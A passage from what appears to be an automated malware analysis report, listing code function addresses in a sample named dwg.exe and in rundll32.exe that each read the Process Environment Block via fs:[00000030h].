      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DC450 mov eax, dword ptr fs:[00000030h]1_2_1E2DC450
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DC450 mov eax, dword ptr fs:[00000030h]1_2_1E2DC450
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25849B mov eax, dword ptr fs:[00000030h]1_2_1E25849B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3014FB mov eax, dword ptr fs:[00000030h]1_2_1E3014FB
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E2C6CF0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E2C6CF0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E2C6CF0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E318CD6 mov eax, dword ptr fs:[00000030h]1_2_1E318CD6
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E318D34 mov eax, dword ptr fs:[00000030h]1_2_1E318D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30E539 mov eax, dword ptr fs:[00000030h]1_2_1E30E539
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]1_2_1E253D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]1_2_1E253D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]1_2_1E253D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]1_2_1E253D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]1_2_1E253D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]1_2_1E253D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]1_2_1E253D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]1_2_1E253D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]1_2_1E253D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]1_2_1E253D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]1_2_1E253D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]1_2_1E253D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E253D34 mov eax, dword ptr fs:[00000030h]1_2_1E253D34
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24AD30 mov eax, dword ptr fs:[00000030h]1_2_1E24AD30
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2CA537 mov eax, dword ptr fs:[00000030h]1_2_1E2CA537
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E274D3B mov eax, dword ptr fs:[00000030h]1_2_1E274D3B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E274D3B mov eax, dword ptr fs:[00000030h]1_2_1E274D3B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E274D3B mov eax, dword ptr fs:[00000030h]1_2_1E274D3B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26C577 mov eax, dword ptr fs:[00000030h]1_2_1E26C577
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26C577 mov eax, dword ptr fs:[00000030h]1_2_1E26C577
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E283D43 mov eax, dword ptr fs:[00000030h]1_2_1E283D43
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C3540 mov eax, dword ptr fs:[00000030h]1_2_1E2C3540
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2F3D40 mov eax, dword ptr fs:[00000030h]1_2_1E2F3D40
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E267D50 mov eax, dword ptr fs:[00000030h]1_2_1E267D50
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2735A1 mov eax, dword ptr fs:[00000030h]1_2_1E2735A1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E271DB5 mov eax, dword ptr fs:[00000030h]1_2_1E271DB5
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E271DB5 mov eax, dword ptr fs:[00000030h]1_2_1E271DB5
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E271DB5 mov eax, dword ptr fs:[00000030h]1_2_1E271DB5
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3105AC mov eax, dword ptr fs:[00000030h]1_2_1E3105AC
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3105AC mov eax, dword ptr fs:[00000030h]1_2_1E3105AC
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272581 mov eax, dword ptr fs:[00000030h]1_2_1E272581
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272581 mov eax, dword ptr fs:[00000030h]1_2_1E272581
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272581 mov eax, dword ptr fs:[00000030h]1_2_1E272581
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272581 mov eax, dword ptr fs:[00000030h]1_2_1E272581
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]1_2_1E242D8A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]1_2_1E242D8A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]1_2_1E242D8A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]1_2_1E242D8A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E242D8A mov eax, dword ptr fs:[00000030h]1_2_1E242D8A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27FD9B mov eax, dword ptr fs:[00000030h]1_2_1E27FD9B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27FD9B mov eax, dword ptr fs:[00000030h]1_2_1E27FD9B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25D5E0 mov eax, dword ptr fs:[00000030h]1_2_1E25D5E0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25D5E0 mov eax, dword ptr fs:[00000030h]1_2_1E25D5E0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E30FDE2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E30FDE2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E30FDE2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E30FDE2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2F8DF1 mov eax, dword ptr fs:[00000030h]1_2_1E2F8DF1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E2C6DC9
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E2C6DC9
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E2C6DC9
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6DC9 mov ecx, dword ptr fs:[00000030h]1_2_1E2C6DC9
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E2C6DC9
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E2C6DC9
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E284A2C mov eax, dword ptr fs:[00000030h]1_2_1E284A2C
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E284A2C mov eax, dword ptr fs:[00000030h]1_2_1E284A2C
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30AA16 mov eax, dword ptr fs:[00000030h]1_2_1E30AA16
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30AA16 mov eax, dword ptr fs:[00000030h]1_2_1E30AA16
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E258A0A mov eax, dword ptr fs:[00000030h]1_2_1E258A0A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24AA16 mov eax, dword ptr fs:[00000030h]1_2_1E24AA16
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24AA16 mov eax, dword ptr fs:[00000030h]1_2_1E24AA16
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E245210 mov eax, dword ptr fs:[00000030h]1_2_1E245210
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E245210 mov ecx, dword ptr fs:[00000030h]1_2_1E245210
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E245210 mov eax, dword ptr fs:[00000030h]1_2_1E245210
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E245210 mov eax, dword ptr fs:[00000030h]1_2_1E245210
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E263A1C mov eax, dword ptr fs:[00000030h]1_2_1E263A1C
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2FB260 mov eax, dword ptr fs:[00000030h]1_2_1E2FB260
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2FB260 mov eax, dword ptr fs:[00000030h]1_2_1E2FB260
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28927A mov eax, dword ptr fs:[00000030h]1_2_1E28927A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E318A62 mov eax, dword ptr fs:[00000030h]1_2_1E318A62
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249240 mov eax, dword ptr fs:[00000030h]1_2_1E249240
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249240 mov eax, dword ptr fs:[00000030h]1_2_1E249240
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249240 mov eax, dword ptr fs:[00000030h]1_2_1E249240
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249240 mov eax, dword ptr fs:[00000030h]1_2_1E249240
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30EA55 mov eax, dword ptr fs:[00000030h]1_2_1E30EA55
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2D4257 mov eax, dword ptr fs:[00000030h]1_2_1E2D4257
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]1_2_1E2452A5
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]1_2_1E2452A5
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]1_2_1E2452A5
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]1_2_1E2452A5
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]1_2_1E2452A5
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25AAB0 mov eax, dword ptr fs:[00000030h]1_2_1E25AAB0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25AAB0 mov eax, dword ptr fs:[00000030h]1_2_1E25AAB0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27FAB0 mov eax, dword ptr fs:[00000030h]1_2_1E27FAB0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27D294 mov eax, dword ptr fs:[00000030h]1_2_1E27D294
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27D294 mov eax, dword ptr fs:[00000030h]1_2_1E27D294
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272AE4 mov eax, dword ptr fs:[00000030h]1_2_1E272AE4
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272ACB mov eax, dword ptr fs:[00000030h]1_2_1E272ACB
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30131B mov eax, dword ptr fs:[00000030h]1_2_1E30131B
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24DB60 mov ecx, dword ptr fs:[00000030h]1_2_1E24DB60
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E273B7A mov eax, dword ptr fs:[00000030h]1_2_1E273B7A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E273B7A mov eax, dword ptr fs:[00000030h]1_2_1E273B7A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24DB40 mov eax, dword ptr fs:[00000030h]1_2_1E24DB40
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E318B58 mov eax, dword ptr fs:[00000030h]1_2_1E318B58
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24F358 mov eax, dword ptr fs:[00000030h]1_2_1E24F358
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E274BAD mov eax, dword ptr fs:[00000030h]1_2_1E274BAD
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E274BAD mov eax, dword ptr fs:[00000030h]1_2_1E274BAD
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E274BAD mov eax, dword ptr fs:[00000030h]1_2_1E274BAD
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E315BA5 mov eax, dword ptr fs:[00000030h]1_2_1E315BA5
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E251B8F mov eax, dword ptr fs:[00000030h]1_2_1E251B8F
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E251B8F mov eax, dword ptr fs:[00000030h]1_2_1E251B8F
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2FD380 mov ecx, dword ptr fs:[00000030h]1_2_1E2FD380
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272397 mov eax, dword ptr fs:[00000030h]1_2_1E272397
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27B390 mov eax, dword ptr fs:[00000030h]1_2_1E27B390
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30138A mov eax, dword ptr fs:[00000030h]1_2_1E30138A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]1_2_1E2703E2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]1_2_1E2703E2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]1_2_1E2703E2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]1_2_1E2703E2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]1_2_1E2703E2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]1_2_1E2703E2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26DBE9 mov eax, dword ptr fs:[00000030h]1_2_1E26DBE9
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C53CA mov eax, dword ptr fs:[00000030h]1_2_1E2C53CA
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C53CA mov eax, dword ptr fs:[00000030h]1_2_1E2C53CA
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]1_2_1E27002D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]1_2_1E27002D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]1_2_1E27002D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]1_2_1E27002D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]1_2_1E27002D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25B02A mov eax, dword ptr fs:[00000030h]1_2_1E25B02A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25B02A mov eax, dword ptr fs:[00000030h]1_2_1E25B02A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25B02A mov eax, dword ptr fs:[00000030h]1_2_1E25B02A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25B02A mov eax, dword ptr fs:[00000030h]1_2_1E25B02A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E314015 mov eax, dword ptr fs:[00000030h]1_2_1E314015
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E314015 mov eax, dword ptr fs:[00000030h]1_2_1E314015
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C7016 mov eax, dword ptr fs:[00000030h]1_2_1E2C7016
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C7016 mov eax, dword ptr fs:[00000030h]1_2_1E2C7016
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C7016 mov eax, dword ptr fs:[00000030h]1_2_1E2C7016
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E302073 mov eax, dword ptr fs:[00000030h]1_2_1E302073
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E311074 mov eax, dword ptr fs:[00000030h]1_2_1E311074
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E260050 mov eax, dword ptr fs:[00000030h]1_2_1E260050
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E260050 mov eax, dword ptr fs:[00000030h]1_2_1E260050
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2890AF mov eax, dword ptr fs:[00000030h]1_2_1E2890AF
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]1_2_1E2720A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]1_2_1E2720A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]1_2_1E2720A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]1_2_1E2720A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]1_2_1E2720A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]1_2_1E2720A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27F0BF mov ecx, dword ptr fs:[00000030h]1_2_1E27F0BF
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27F0BF mov eax, dword ptr fs:[00000030h]1_2_1E27F0BF
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27F0BF mov eax, dword ptr fs:[00000030h]1_2_1E27F0BF
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249080 mov eax, dword ptr fs:[00000030h]1_2_1E249080
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C3884 mov eax, dword ptr fs:[00000030h]1_2_1E2C3884
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C3884 mov eax, dword ptr fs:[00000030h]1_2_1E2C3884
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2440E1 mov eax, dword ptr fs:[00000030h]1_2_1E2440E1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2440E1 mov eax, dword ptr fs:[00000030h]1_2_1E2440E1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2440E1 mov eax, dword ptr fs:[00000030h]1_2_1E2440E1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2458EC mov eax, dword ptr fs:[00000030h]1_2_1E2458EC
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E2DB8D0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DB8D0 mov ecx, dword ptr fs:[00000030h]1_2_1E2DB8D0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E2DB8D0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E2DB8D0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E2DB8D0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E2DB8D0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120 mov eax, dword ptr fs:[00000030h]1_2_1E264120
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120 mov eax, dword ptr fs:[00000030h]1_2_1E264120
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120 mov eax, dword ptr fs:[00000030h]1_2_1E264120
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120 mov eax, dword ptr fs:[00000030h]1_2_1E264120
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120 mov ecx, dword ptr fs:[00000030h]1_2_1E264120
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27513A mov eax, dword ptr fs:[00000030h]1_2_1E27513A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27513A mov eax, dword ptr fs:[00000030h]1_2_1E27513A
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249100 mov eax, dword ptr fs:[00000030h]1_2_1E249100
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249100 mov eax, dword ptr fs:[00000030h]1_2_1E249100
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249100 mov eax, dword ptr fs:[00000030h]1_2_1E249100
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24C962 mov eax, dword ptr fs:[00000030h]1_2_1E24C962
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B171 mov eax, dword ptr fs:[00000030h]1_2_1E24B171
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B171 mov eax, dword ptr fs:[00000030h]1_2_1E24B171
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26B944 mov eax, dword ptr fs:[00000030h]1_2_1E26B944
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26B944 mov eax, dword ptr fs:[00000030h]1_2_1E26B944
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2761A0 mov eax, dword ptr fs:[00000030h]1_2_1E2761A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2761A0 mov eax, dword ptr fs:[00000030h]1_2_1E2761A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C69A6 mov eax, dword ptr fs:[00000030h]1_2_1E2C69A6
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C51BE mov eax, dword ptr fs:[00000030h]1_2_1E2C51BE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C51BE mov eax, dword ptr fs:[00000030h]1_2_1E2C51BE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C51BE mov eax, dword ptr fs:[00000030h]1_2_1E2C51BE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C51BE mov eax, dword ptr fs:[00000030h]1_2_1E2C51BE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3049A4 mov eax, dword ptr fs:[00000030h]1_2_1E3049A4
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3049A4 mov eax, dword ptr fs:[00000030h]1_2_1E3049A4
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3049A4 mov eax, dword ptr fs:[00000030h]1_2_1E3049A4
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3049A4 mov eax, dword ptr fs:[00000030h]1_2_1E3049A4
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27A185 mov eax, dword ptr fs:[00000030h]1_2_1E27A185
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26C182 mov eax, dword ptr fs:[00000030h]1_2_1E26C182
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272990 mov eax, dword ptr fs:[00000030h]1_2_1E272990
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2D41E8 mov eax, dword ptr fs:[00000030h]1_2_1E2D41E8
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B1E1 mov eax, dword ptr fs:[00000030h]1_2_1E24B1E1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B1E1 mov eax, dword ptr fs:[00000030h]1_2_1E24B1E1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B1E1 mov eax, dword ptr fs:[00000030h]1_2_1E24B1E1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_0056587D mov eax, dword ptr fs:[00000030h]1_2_0056587D
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565866 mov eax, dword ptr fs:[00000030h]1_2_00565866
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_005658D6 mov eax, dword ptr fs:[00000030h]1_2_005658D6
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00564AB9 mov eax, dword ptr fs:[00000030h]1_2_00564AB9
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00564F41 mov eax, dword ptr fs:[00000030h]1_2_00564F41
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A44B mov eax, dword ptr fs:[00000030h]13_2_0444A44B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AC450 mov eax, dword ptr fs:[00000030h]13_2_044AC450
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AC450 mov eax, dword ptr fs:[00000030h]13_2_044AC450
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443746D mov eax, dword ptr fs:[00000030h]13_2_0443746D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E740D mov eax, dword ptr fs:[00000030h]13_2_044E740D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E740D mov eax, dword ptr fs:[00000030h]13_2_044E740D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E740D mov eax, dword ptr fs:[00000030h]13_2_044E740D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496C0A mov eax, dword ptr fs:[00000030h]13_2_04496C0A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496C0A mov eax, dword ptr fs:[00000030h]13_2_04496C0A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496C0A mov eax, dword ptr fs:[00000030h]13_2_04496C0A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496C0A mov eax, dword ptr fs:[00000030h]13_2_04496C0A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
